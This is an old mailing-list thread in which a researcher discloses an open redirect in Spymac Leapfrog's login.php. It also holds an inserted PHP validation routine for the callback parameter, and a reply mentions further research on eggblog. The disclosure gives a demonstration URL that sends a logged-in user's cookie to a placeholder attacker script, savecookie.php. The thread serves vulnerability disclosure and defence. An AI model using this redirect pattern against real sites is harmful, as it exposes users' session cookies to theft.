Possible illegal redirection on Spymac Leapfrog


Lostmon

Mar 5, 2007, 3:09:37 PM
to los...@googlegroups.com
Possible illegal redirection in login.php ...
A remote attacker can compose a specially crafted URL, and when a user logs in at this URL the attacker can gain access to the user's cookie or some other information submitted by this user.

A simple demonstration of this situation:

http://[VICTIM]/http://www.spymac.com/login.php?callback=http://[ATTACKER]/savecookie.php

Related:

http://classic.spymac.com/forums/showthread.php?threadid=266954&post=5120972#post_5120972

--
Sincerely:
Lostmon (los...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....
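
One way a login handler could constrain the `callback` parameter described in the post above. This is an added example, not part of the original post and not Spymac's code; the function name, host allowlist and default path are assumptions.

```php
<?php
// Added example: hypothetical helper, not Spymac's code.
const ALLOWED_CALLBACK_HOSTS = ['www.spymac.com', 'classic.spymac.com']; // assumed
const DEFAULT_CALLBACK = '/index.php'; // assumed landing page

function safe_callback($callback): string
{
    if (!is_string($callback) || $callback === '') {
        return DEFAULT_CALLBACK;
    }
    // Browsers normalise backslashes, whitespace and control characters
    // differently from parse_url(), so refuse them outright.
    if (preg_match('/[\x00-\x20\x7f\\\\]/', $callback)) {
        return DEFAULT_CALLBACK;
    }
    $parts = parse_url($callback);
    if ($parts === false) {
        return DEFAULT_CALLBACK;
    }
    // Same-site path: no scheme or host, and exactly one leading slash
    // ("//host/" is scheme-relative and leaves the site).
    if (!isset($parts['scheme']) && !isset($parts['host'])) {
        $local = $callback[0] === '/' && strncmp($callback, '//', 2) !== 0;
        return $local ? $callback : DEFAULT_CALLBACK;
    }
    // Absolute URL: http(s) only, no userinfo, exact host match.
    $scheme = strtolower($parts['scheme'] ?? '');
    $host = strtolower($parts['host'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true)
        || isset($parts['user']) || isset($parts['pass'])
        || !in_array($host, ALLOWED_CALLBACK_HOSTS, true)) {
        return DEFAULT_CALLBACK;
    }
    return $callback;
}

// Constructed sample values for the callback parameter.
$samples = [
    '/forums/index.php',
    'http://www.spymac.com/forums/',
    'http://attacker.example/savecookie.php',
    '//attacker.example/savecookie.php',
    'http://www.spymac.com@attacker.example/',
    'http://www.spymac.com.attacker.example/',
];
foreach ($samples as $value) {
    printf("%-45s => %s\n", $value, safe_callback($value));
}
// In login.php: header('Location: ' . safe_callback($_GET['callback'] ?? null));
```

Only the first two constructed samples are returned unchanged; the other four fall back to the default path.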

FalconDeOro

Mar 7, 2007, 4:22:42 AM
to los...@googlegroups.com
Hehehehe, good work Lostmon. Right now I'm working on EGGBLOG, a script written in PHP, and well, I've found a few things in it. I'll publish them little by little; I'd rather investigate it further.

Regards

On 5/03/07, Lostmon <los...@gmail.com> wrote:


--
Sincerely:
FalconDeOro (falcondeoro.gmail.com)
Web-Blog: http://falcondeoro.blogspot.com
